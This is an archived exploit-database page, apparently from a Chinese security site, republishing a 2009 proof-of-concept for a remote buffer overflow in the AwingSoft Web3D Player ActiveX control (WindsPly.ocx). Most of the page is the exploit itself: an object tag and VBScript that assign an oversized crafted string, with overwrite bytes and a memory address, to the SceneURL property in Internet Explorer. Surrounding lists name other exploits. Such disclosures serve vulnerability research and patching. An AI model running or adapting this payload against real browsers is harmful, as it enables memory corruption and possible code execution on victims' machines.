首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AwingSoft Web3D Player (WindsPly.ocx) Remote BOF PoC
来源:http://www.shinnai.net/ 作者:shinnai 发布时间:2009-07-13  

-----------------------------------------------------------------------------
 AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow
 url: http://www.awingsoft.com/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net/

 Dedicated to aaannamariaaa :D

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 File: WindsPly.ocx
 Ver.: <= 3.5.0.0
 GUID: {17A54E7D-A9D4-11D8-9552-00E04CB09903}
 ProgID: WindsPlayerIE.View.1

 Marked as:
 RegKey Safe for Script: Falso
 RegKey Safe for Init: Falso
 Implements IObjectSafety: Vero
 IDisp Safe: Safe for untrusted: caller,data
 IPersist Safe: Safe for untrusted: caller,data
 IPStorage Safe: Safe for untrusted: caller,data

 Tested on Windows XP Professional SP3 all patched, with Internet Explorer 8
-----------------------------------------------------------------------------
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='test'></object>

<script language='vbscript'>
  buff = String(8704, "A")
  mReg = unescape("bbbb")
  mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW
  buf1 = String(88, "c")
  buf2 = String(47284, "D")

  test.SceneURL = buff + mReg + mExc + buf1 + buf2
</script>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eEye Retina WiFi Security Scan
·Linux/x86 Port Binding Shellco
·OtsAv DJ/TV/Radio Multiple Loc
·Morcego CMS <= 1.7.6 Remote Bl
·ToyLog 0.1 SQL Injection Vulne
·M3U/M3L to ASX/WPL 1.1 (ASX,M
·MS Internet Explorer 7 Video A
·Playlistmaker 1.5 (.M3U/M3L/T
·Photo DVD Maker Pro <= 8.02 (.
·d.net CMS Arbitrary Reinstall/
·PatPlayer 3.9 (M3U File) Local
·Pirch IRC 98 Client (response)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved